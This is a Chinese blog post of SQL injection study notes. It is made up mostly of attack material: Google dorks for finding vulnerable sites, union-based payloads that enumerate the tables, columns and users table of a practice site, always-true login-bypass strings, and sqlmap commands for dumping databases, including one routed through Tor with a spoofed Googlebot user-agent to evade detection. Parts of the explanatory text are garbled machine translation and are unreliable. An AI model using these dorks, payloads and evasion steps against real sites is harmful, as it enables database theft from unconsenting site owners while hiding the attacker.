sql注入學習簡單記錄

z奶油麵包發表於2018-02-28
版權宣告:轉載請註明出處:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396286

參考文章

參考學習:http://bbs.pediy.com/thread-218235.htm

Google search:
inurl:”products.php?prodID=”

inurl:buy.php?category=

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat=`

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

有時伺服器不能直接理解@@ version命令,需要轉換它。您將需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替換@@版本。

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

SQL隱碼攻擊的型別
經典SQLI
盲注或推斷SQL隱碼攻擊資料庫管理系統
特定的SQLI
複合SQLI
SQL隱碼攻擊+認證不足
SQL隱碼攻擊+ DDoS 攻擊
SQL隱碼攻擊+ DNS劫持
SQL隱碼攻擊+ XSS

錯誤過濾的轉義字元

當使用者輸入未針對轉義字元 進行過濾時,會發生這種形式的SQL隱碼攻擊 ,然後將其傳遞到SQL語句
statement = “SELECT*FROM users WHERE name =`” + userName + “`;”

使用註釋甚至阻止查詢的其餘部分(有三種型別的SQL註釋)。所有三行最後都有一個空格:
` or `1`=`1` —
` or `1`=`1` ({
` or `1`=`1` /*

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5

偽裝成Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5 –user-agent=”Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”


相關文章